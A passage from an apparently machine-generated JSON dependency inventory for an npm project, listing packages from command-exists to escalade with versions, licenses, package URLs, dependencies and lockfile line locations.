7293 } ], "AnalyzedBy": "npm" }, { "ID": "command-exists@1.2.9", "Name": "command-exists", "Identifier": { "PURL": "pkg:npm/command-exists@1.2.9", "UID": "1b817a11e4818617" }, "Version": "1.2.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7294, "EndLine": 7300 } ], "AnalyzedBy": "npm" }, { "ID": "commander@12.1.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@12.1.0", "UID": "14f2721297505ec3" }, "Version": "12.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18695, "EndLine": 18703 } ], "AnalyzedBy": "npm" }, { "ID": "commander@13.1.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@13.1.0", "UID": "bb3fa0a0d6c891e1" }, "Version": "13.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17597, "EndLine": 17605 } ], "AnalyzedBy": "npm" }, { "ID": "commander@2.20.3", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@2.20.3", "UID": "1ecb21087f876383" }, "Version": "2.20.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20539, "EndLine": 20544 } ], "AnalyzedBy": "npm" }, { "ID": "commander@7.2.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@7.2.0", "UID": "4addfd5cedcf398e" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20423, "EndLine": 20431 } ], "AnalyzedBy": "npm" }, { "ID": "commander@9.5.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@9.5.0", "UID": "3de59038a0079788" }, "Version": "9.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7301, "EndLine": 7310 } ], "AnalyzedBy": "npm" }, { "ID": "common-ancestor-path@1.0.1", "Name": "common-ancestor-path", "Identifier": { "PURL": "pkg:npm/common-ancestor-path@1.0.1", "UID": "fb03d8d5d0ccf835" }, "Version": "1.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14199, "EndLine": 14203 } ], "AnalyzedBy": "npm" }, { "ID": "compressible@2.0.18", "Name": "compressible", "Identifier": { "PURL": "pkg:npm/compressible@2.0.18", "UID": "fd748365cdb4e6dc" }, "Version": "2.0.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-db@1.52.0" ], "Locations": [ { "StartLine": 7311, "EndLine": 7323 } ], "AnalyzedBy": "npm" }, { "ID": "compression@1.8.1", "Name": "compression", "Identifier": { "PURL": "pkg:npm/compression@1.8.1", "UID": "d6d16cfb7a9a0a79" }, "Version": "1.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "compressible@2.0.18", "debug@2.6.9", "negotiator@0.6.4", "on-headers@1.1.0", "safe-buffer@5.2.1", "vary@1.1.2" ], "Locations": [ { "StartLine": 7324, "EndLine": 7342 } ], "AnalyzedBy": "npm" }, { "ID": "concat-map@0.0.1", "Name": "concat-map", "Identifier": { "PURL": "pkg:npm/concat-map@0.0.1", "UID": "eed36198cca27652" }, "Version": "0.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7360, "EndLine": 7365 } ], "AnalyzedBy": "npm" }, { "ID": "connect@3.7.0", "Name": "connect", "Identifier": { "PURL": "pkg:npm/connect@3.7.0", "UID": "487429269ce0b974" }, "Version": "3.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "finalhandler@1.1.2", "parseurl@1.3.3", "utils-merge@1.0.1" ], "Locations": [ { "StartLine": 7366, "EndLine": 7380 } ], "AnalyzedBy": "npm" }, { "ID": "console-control-strings@1.1.0", "Name": "console-control-strings", "Identifier": { "PURL": "pkg:npm/console-control-strings@1.1.0", "UID": "f76bd653878f04a4" }, "Version": "1.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7396, "EndLine": 7401 } ], "AnalyzedBy": "npm" }, { "ID": "content-type@1.0.5", "Name": "content-type", "Identifier": { "PURL": "pkg:npm/content-type@1.0.5", "UID": "3f97b127eb54c6a" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7402, "EndLine": 7411 } ], "AnalyzedBy": "npm" }, { "ID": "convert-source-map@2.0.0", "Name": "convert-source-map", "Identifier": { "PURL": "pkg:npm/convert-source-map@2.0.0", "UID": "d3e0904d5263fddd" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7412, "EndLine": 7417 } ], "AnalyzedBy": "npm" }, { "ID": "core-js@1.2.7", "Name": "core-js", "Identifier": { "PURL": "pkg:npm/core-js@1.2.7", "UID": "88323f6ab79972fa" }, "Version": "1.2.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7418, "EndLine": 7424 } ], "AnalyzedBy": "npm" }, { "ID": "core-js-compat@3.45.1", "Name": "core-js-compat", "Identifier": { "PURL": "pkg:npm/core-js-compat@3.45.1", "UID": "de79c5fcf78157bb" }, "Version": "3.45.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserslist@4.26.3" ], "Locations": [ { "StartLine": 7425, "EndLine": 7437 } ], "AnalyzedBy": "npm" }, { "ID": "core-util-is@1.0.3", "Name": "core-util-is", "Identifier": { "PURL": "pkg:npm/core-util-is@1.0.3", "UID": "328598584642e811" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7438, "EndLine": 7443 } ], "AnalyzedBy": "npm" }, { "ID": "cosmiconfig@8.3.6", "Name": "cosmiconfig", "Identifier": { "PURL": "pkg:npm/cosmiconfig@8.3.6", "UID": "590154b20d5ccc78" }, "Version": "8.3.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "import-fresh@3.3.1", "js-yaml@4.1.0", "parse-json@5.2.0", "path-type@4.0.0", "typescript@5.9.3" ], "Locations": [ { "StartLine": 5156, "EndLine": 5181 }, { "StartLine": 5242, "EndLine": 5267 } ], "AnalyzedBy": "npm" }, { "ID": "cosmiconfig@9.0.0", "Name": "cosmiconfig", "Identifier": { "PURL": "pkg:npm/cosmiconfig@9.0.0", "UID": "f0c094ee8a6fe3ce" }, "Version": "9.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "env-paths@2.2.1", "import-fresh@3.3.1", "js-yaml@4.1.0", "parse-json@5.2.0", "typescript@5.9.3" ], "Locations": [ { "StartLine": 7444, "EndLine": 7470 } ], "AnalyzedBy": "npm" }, { "ID": "cross-spawn@7.0.6", "Name": "cross-spawn", "Identifier": { "PURL": "pkg:npm/cross-spawn@7.0.6", "UID": "9ee160f916dde12c" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-key@3.1.1", "shebang-command@2.0.0", "which@2.0.2" ], "Locations": [ { "StartLine": 7493, "EndLine": 7506 }, { "StartLine": 14204, "EndLine": 14218 } ], "AnalyzedBy": "npm" }, { "ID": "css-color-keywords@1.0.0", "Name": "css-color-keywords", "Identifier": { "PURL": "pkg:npm/css-color-keywords@1.0.0", "UID": "7279c827477baed8" }, "Version": "1.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7507, "EndLine": 7515 } ], "AnalyzedBy": "npm" }, { "ID": "css-line-break@2.1.0", "Name": "css-line-break", "Identifier": { "PURL": "pkg:npm/css-line-break@2.1.0", "UID": "205a52c74078f4d9" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "utrie@1.0.2" ], "Locations": [ { "StartLine": 7516, "EndLine": 7524 } ], "AnalyzedBy": "npm" }, { "ID": "css-select@5.2.2", "Name": "css-select", "Identifier": { "PURL": "pkg:npm/css-select@5.2.2", "UID": "c1142afa14774334" }, "Version": "5.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "boolbase@1.0.0", "css-what@6.2.2", "domhandler@5.0.3", "domutils@3.2.2", "nth-check@2.1.1" ], "Locations": [ { "StartLine": 7525, "EndLine": 7540 } ], "AnalyzedBy": "npm" }, { "ID": "css-to-react-native@3.2.0", "Name": "css-to-react-native", "Identifier": { "PURL": "pkg:npm/css-to-react-native@3.2.0", "UID": "81b41aad14d22700" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelize@1.0.1", "css-color-keywords@1.0.0", "postcss-value-parser@4.2.0" ], "Locations": [ { "StartLine": 7541, "EndLine": 7551 } ], "AnalyzedBy": "npm" }, { "ID": "css-tree@1.1.3", "Name": "css-tree", "Identifier": { "PURL": "pkg:npm/css-tree@1.1.3", "UID": "4dcff6a3da776604" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mdn-data@2.0.14", "source-map@0.6.1" ], "Locations": [ { "StartLine": 7552, "EndLine": 7564 } ], "AnalyzedBy": "npm" }, { "ID": "css-tree@2.2.1", "Name": "css-tree", "Identifier": { "PURL": "pkg:npm/css-tree@2.2.1", "UID": "ce3447fad55a0bff" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mdn-data@2.0.28", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 7590, "EndLine": 7603 } ], "AnalyzedBy": "npm" }, { "ID": "css-tree@2.3.1", "Name": "css-tree", "Identifier": { "PURL": "pkg:npm/css-tree@2.3.1", "UID": "fac74808b12b4d3b" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mdn-data@2.0.30", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 20432, "EndLine": 20444 } ], "AnalyzedBy": "npm" }, { "ID": "css-what@6.2.2", "Name": "css-what", "Identifier": { "PURL": "pkg:npm/css-what@6.2.2", "UID": "535a7a30445a30d6" }, "Version": "6.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7565, "EndLine": 7576 } ], "AnalyzedBy": "npm" }, { "ID": "cssesc@3.0.0", "Name": "cssesc", "Identifier": { "PURL": "pkg:npm/cssesc@3.0.0", "UID": "bc375f8fe89ab9d7" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14240, "EndLine": 14252 } ], "AnalyzedBy": "npm" }, { "ID": "csso@5.0.5", "Name": "csso", "Identifier": { "PURL": "pkg:npm/csso@5.0.5", "UID": "95e6071e7bd200dc" }, "Version": "5.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "css-tree@2.2.1" ], "Locations": [ { "StartLine": 7577, "EndLine": 7589 } ], "AnalyzedBy": "npm" }, { "ID": "csstype@3.1.3", "Name": "csstype", "Identifier": { "PURL": "pkg:npm/csstype@3.1.3", "UID": "6a7c0288bdc82f59" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7610, "EndLine": 7616 } ], "AnalyzedBy": "npm" }, { "ID": "dayjs@1.11.18", "Name": "dayjs", "Identifier": { "PURL": "pkg:npm/dayjs@1.11.18", "UID": "ae99dfcdb6be87aa" }, "Version": "1.11.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7671, "EndLine": 7677 } ], "AnalyzedBy": "npm" }, { "ID": "debug@2.6.9", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@2.6.9", "UID": "a89c5a866f6bb410" }, "Version": "2.6.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.0.0" ], "Locations": [ { "StartLine": 6665, "EndLine": 6674 }, { "StartLine": 7343, "EndLine": 7352 }, { "StartLine": 7381, "EndLine": 7389 }, { "StartLine": 9267, "EndLine": 9275 }, { "StartLine": 11816, "EndLine": 11824 }, { "StartLine": 19324, "EndLine": 19332 } ], "AnalyzedBy": "npm" }, { "ID": "debug@4.4.3", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@4.4.3", "UID": "c55a5d5b5cce812d" }, "Version": "4.4.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.1.3" ], "Locations": [ { "StartLine": 7678, "EndLine": 7694 }, { "StartLine": 14253, "EndLine": 14270 } ], "AnalyzedBy": "npm" }, { "ID": "decamelize@1.2.0", "Name": "decamelize", "Identifier": { "PURL": "pkg:npm/decamelize@1.2.0", "UID": "e3a7003efcb8d07a" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7695, "EndLine": 7703 } ], "AnalyzedBy": "npm" }, { "ID": "decamelize-keys@1.1.1", "Name": "decamelize-keys", "Identifier": { "PURL": "pkg:npm/decamelize-keys@1.1.1", "UID": "2ed052259c13ee31" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decamelize@1.2.0", "map-obj@1.0.1" ], "Locations": [ { "StartLine": 7704, "EndLine": 7719 } ], "AnalyzedBy": "npm" }, { "ID": "decode-uri-component@0.2.2", "Name": "decode-uri-component", "Identifier": { "PURL": "pkg:npm/decode-uri-component@0.2.2", "UID": "fdd22f9fcd2eaf" }, "Version": "0.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7729, "EndLine": 7737 } ], "AnalyzedBy": "npm" }, { "ID": "decompress-response@6.0.0", "Name": "decompress-response", "Identifier": { "PURL": "pkg:npm/decompress-response@6.0.0", "UID": "244cbc3b112694da" }, "Version": "6.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mimic-response@3.1.0" ], "Locations": [ { "StartLine": 7738, "EndLine": 7752 } ], "AnalyzedBy": "npm" }, { "ID": "deep-extend@0.6.0", "Name": "deep-extend", "Identifier": { "PURL": "pkg:npm/deep-extend@0.6.0", "UID": "d96d23cbff90a14" }, "Version": "0.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7768, "EndLine": 7776 } ], "AnalyzedBy": "npm" }, { "ID": "deepmerge@3.3.0", "Name": "deepmerge", "Identifier": { "PURL": "pkg:npm/deepmerge@3.3.0", "UID": "4b4da8eb91825209" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2152, "EndLine": 2160 } ], "AnalyzedBy": "npm" }, { "ID": "deepmerge@4.3.1", "Name": "deepmerge", "Identifier": { "PURL": "pkg:npm/deepmerge@4.3.1", "UID": "17b88f6377ec65b3" }, "Version": "4.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7784, "EndLine": 7792 } ], "AnalyzedBy": "npm" }, { "ID": "defaults@1.0.4", "Name": "defaults", "Identifier": { "PURL": "pkg:npm/defaults@1.0.4", "UID": "750f5795c13c80bf" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "clone@1.0.4" ], "Locations": [ { "StartLine": 7793, "EndLine": 7804 } ], "AnalyzedBy": "npm" }, { "ID": "define-data-property@1.1.4", "Name": "define-data-property", "Identifier": { "PURL": "pkg:npm/define-data-property@1.1.4", "UID": "e8bc397498fdf87a" }, "Version": "1.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-define-property@1.0.1", "es-errors@1.3.0", "gopd@1.2.0" ], "Locations": [ { "StartLine": 7805, "EndLine": 7821 } ], "AnalyzedBy": "npm" }, { "ID": "delayed-stream@1.0.0", "Name": "delayed-stream", "Identifier": { "PURL": "pkg:npm/delayed-stream@1.0.0", "UID": "9725f4595650f3a1" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7840, "EndLine": 7848 } ], "AnalyzedBy": "npm" }, { "ID": "delegates@1.0.0", "Name": "delegates", "Identifier": { "PURL": "pkg:npm/delegates@1.0.0", "UID": "91d8b2836b187ee9" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7849, "EndLine": 7854 } ], "AnalyzedBy": "npm" }, { "ID": "depd@2.0.0", "Name": "depd", "Identifier": { "PURL": "pkg:npm/depd@2.0.0", "UID": "1f1893b7fe7982fd" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7855, "EndLine": 7863 } ], "AnalyzedBy": "npm" }, { "ID": "destroy@1.2.0", "Name": "destroy", "Identifier": { "PURL": "pkg:npm/destroy@1.2.0", "UID": "bcd60dccdcfb8166" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7884, "EndLine": 7893 } ], "AnalyzedBy": "npm" }, { "ID": "detect-indent@6.1.0", "Name": "detect-indent", "Identifier": { "PURL": "pkg:npm/detect-indent@6.1.0", "UID": "9b32a1024de9297f" }, "Version": "6.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7894, "EndLine": 7902 } ], "AnalyzedBy": "npm" }, { "ID": "detect-libc@2.1.2", "Name": "detect-libc", "Identifier": { "PURL": "pkg:npm/detect-libc@2.1.2", "UID": "fb44c10a49e991c7" }, "Version": "2.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7903, "EndLine": 7911 } ], "AnalyzedBy": "npm" }, { "ID": "diff@8.0.2", "Name": "diff", "Identifier": { "PURL": "pkg:npm/diff@8.0.2", "UID": "cb8731532713510" }, "Version": "8.0.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 14271, "EndLine": 14278 } ], "AnalyzedBy": "npm" }, { "ID": "dom-serializer@2.0.0", "Name": "dom-serializer", "Identifier": { "PURL": "pkg:npm/dom-serializer@2.0.0", "UID": "14d2f52465f3bca3" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0", "domhandler@5.0.3", "entities@4.5.0" ], "Locations": [ { "StartLine": 7958, "EndLine": 7971 } ], "AnalyzedBy": "npm" }, { "ID": "domelementtype@2.3.0", "Name": "domelementtype", "Identifier": { "PURL": "pkg:npm/domelementtype@2.3.0", "UID": "eae0dcc2e241e569" }, "Version": "2.3.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7972, "EndLine": 7983 } ], "AnalyzedBy": "npm" }, { "ID": "domhandler@5.0.3", "Name": "domhandler", "Identifier": { "PURL": "pkg:npm/domhandler@5.0.3", "UID": "6dab5252439f6b75" }, "Version": "5.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0" ], "Locations": [ { "StartLine": 7984, "EndLine": 7998 } ], "AnalyzedBy": "npm" }, { "ID": "domutils@3.2.2", "Name": "domutils", "Identifier": { "PURL": "pkg:npm/domutils@3.2.2", "UID": "ac4982c040715ad8" }, "Version": "3.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dom-serializer@2.0.0", "domelementtype@2.3.0", "domhandler@5.0.3" ], "Locations": [ { "StartLine": 7999, "EndLine": 8012 } ], "AnalyzedBy": "npm" }, { "ID": "dooboolab-welcome@1.3.2", "Name": "dooboolab-welcome", "Identifier": { "PURL": "pkg:npm/dooboolab-welcome@1.3.2", "UID": "391bf2bd0021f343" }, "Version": "1.3.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8013, "EndLine": 8022 } ], "AnalyzedBy": "npm" }, { "ID": "dot-case@3.0.4", "Name": "dot-case", "Identifier": { "PURL": "pkg:npm/dot-case@3.0.4", "UID": "b110045c2ba3a5aa" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "no-case@3.0.4", "tslib@2.8.1" ], "Locations": [ { "StartLine": 8023, "EndLine": 8032 } ], "AnalyzedBy": "npm" }, { "ID": "dunder-proto@1.0.1", "Name": "dunder-proto", "Identifier": { "PURL": "pkg:npm/dunder-proto@1.0.1", "UID": "5e0fbfeaa6edd664" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-errors@1.3.0", "gopd@1.2.0" ], "Locations": [ { "StartLine": 8039, "EndLine": 8052 } ], "AnalyzedBy": "npm" }, { "ID": "eastasianwidth@0.2.0", "Name": "eastasianwidth", "Identifier": { "PURL": "pkg:npm/eastasianwidth@0.2.0", "UID": "53f18e1f9441982c" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8053, "EndLine": 8058 }, { "StartLine": 14279, "EndLine": 14285 } ], "AnalyzedBy": "npm" }, { "ID": "ee-first@1.1.1", "Name": "ee-first", "Identifier": { "PURL": "pkg:npm/ee-first@1.1.1", "UID": "87900c11bb31de69" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8059, "EndLine": 8064 } ], "AnalyzedBy": "npm" }, { "ID": "electron-to-chromium@1.5.233", "Name": "electron-to-chromium", "Identifier": { "PURL": "pkg:npm/electron-to-chromium@1.5.233", "UID": "66039396398d03e" }, "Version": "1.5.233", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8065, "EndLine": 8070 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@8.0.0", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@8.0.0", "UID": "bcb499b5e1978c54" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8084, "EndLine": 8089 }, { "StartLine": 14286, "EndLine": 14292 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@9.2.2", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@9.2.2", "UID": "32aeba11b364bb58" }, "Version": "9.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3352, "EndLine": 3357 }, { "StartLine": 13579, "EndLine": 13585 }, { "StartLine": 15931, "EndLine": 15937 } ], "AnalyzedBy": "npm" }, { "ID": "encodeurl@1.0.2", "Name": "encodeurl", "Identifier": { "PURL": "pkg:npm/encodeurl@1.0.2", "UID": "d0b05858e12ee999" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8090, "EndLine": 8098 } ], "AnalyzedBy": "npm" }, { "ID": "encodeurl@2.0.0", "Name": "encodeurl", "Identifier": { "PURL": "pkg:npm/encodeurl@2.0.0", "UID": "cb4765174bcfd278" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19384, "EndLine": 19392 } ], "AnalyzedBy": "npm" }, { "ID": "encoding@0.1.13", "Name": "encoding", "Identifier": { "PURL": "pkg:npm/encoding@0.1.13", "UID": "f6d3c0313e68dda9" }, "Version": "0.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "iconv-lite@0.6.3" ], "Locations": [ { "StartLine": 8099, "EndLine": 8107 }, { "StartLine": 14293, "EndLine": 14303 } ], "AnalyzedBy": "npm" }, { "ID": "end-of-stream@1.4.5", "Name": "end-of-stream", "Identifier": { "PURL": "pkg:npm/end-of-stream@1.4.5", "UID": "457ff51239c0f42f" }, "Version": "1.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "once@1.4.0" ], "Locations": [ { "StartLine": 8120, "EndLine": 8128 } ], "AnalyzedBy": "npm" }, { "ID": "entities@2.0.3", "Name": "entities", "Identifier": { "PURL": "pkg:npm/entities@2.0.3", "UID": "4423a6f93af1f59d" }, "Version": "2.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12267, "EndLine": 12272 } ], "AnalyzedBy": "npm" }, { "ID": "entities@4.5.0", "Name": "entities", "Identifier": { "PURL": "pkg:npm/entities@4.5.0", "UID": "818854eeb62c24c2" }, "Version": "4.5.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8129, "EndLine": 8140 } ], "AnalyzedBy": "npm" }, { "ID": "env-paths@2.2.1", "Name": "env-paths", "Identifier": { "PURL": "pkg:npm/env-paths@2.2.1", "UID": "ecfe188e5092491f" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8141, "EndLine": 8150 }, { "StartLine": 14304, "EndLine": 14313 } ], "AnalyzedBy": "npm" }, { "ID": "envinfo@7.17.0", "Name": "envinfo", "Identifier": { "PURL": "pkg:npm/envinfo@7.17.0", "UID": "2e724fd7011ceda8" }, "Version": "7.17.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8151, "EndLine": 8163 } ], "AnalyzedBy": "npm" }, { "ID": "err-code@2.0.3", "Name": "err-code", "Identifier": { "PURL": "pkg:npm/err-code@2.0.3", "UID": "2a163f9a2b46cc5d" }, "Version": "2.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8164, "EndLine": 8170 }, { "StartLine": 14314, "EndLine": 14320 } ], "AnalyzedBy": "npm" }, { "ID": "error-ex@1.3.4", "Name": "error-ex", "Identifier": { "PURL": "pkg:npm/error-ex@1.3.4", "UID": "bd9f56e67b348dc5" }, "Version": "1.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-arrayish@0.2.1" ], "Locations": [ { "StartLine": 8171, "EndLine": 8179 } ], "AnalyzedBy": "npm" }, { "ID": "error-stack-parser@2.1.4", "Name": "error-stack-parser", "Identifier": { "PURL": "pkg:npm/error-stack-parser@2.1.4", "UID": "58c5b60962d9e17f" }, "Version": "2.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stackframe@1.3.4" ], "Locations": [ { "StartLine": 8180, "EndLine": 8188 } ], "AnalyzedBy": "npm" }, { "ID": "errorhandler@1.5.1", "Name": "errorhandler", "Identifier": { "PURL": "pkg:npm/errorhandler@1.5.1", "UID": "eb05d9008f77eb49" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "accepts@1.3.8", "escape-html@1.0.3" ], "Locations": [ { "StartLine": 8189, "EndLine": 8202 } ], "AnalyzedBy": "npm" }, { "ID": "es-define-property@1.0.1", "Name": "es-define-property", "Identifier": { "PURL": "pkg:npm/es-define-property@1.0.1", "UID": "c4337408528a00ae" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8272, "EndLine": 8280 } ], "AnalyzedBy": "npm" }, { "ID": "es-errors@1.3.0", "Name": "es-errors", "Identifier": { "PURL": "pkg:npm/es-errors@1.3.0", "UID": "e1e622ca7d308ae" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8281, "EndLine": 8289 } ], "AnalyzedBy": "npm" }, { "ID": "es-object-atoms@1.1.1", "Name": "es-object-atoms", "Identifier": { "PURL": "pkg:npm/es-object-atoms@1.1.1", "UID": "13c55c7fab650fa0" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0" ], "Locations": [ { "StartLine": 8318, "EndLine": 8329 } ], "AnalyzedBy": "npm" }, { "ID": "es-set-tostringtag@2.1.0", "Name": "es-set-tostringtag", "Identifier": { "PURL": "pkg:npm/es-set-tostringtag@2.1.0", "UID": "1952ae335638f8c2" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "get-intrinsic@1.3.0", "has-tostringtag@1.0.2", "hasown@2.0.2" ], "Locations": [ { "StartLine": 8330, "EndLine": 8344 } ], "AnalyzedBy": "npm" }, { "ID": "escalade@3.2.0", "Name": "escalade", "Identifier": { "PURL": "pkg:npm/escalade@3.2.0", "UID": 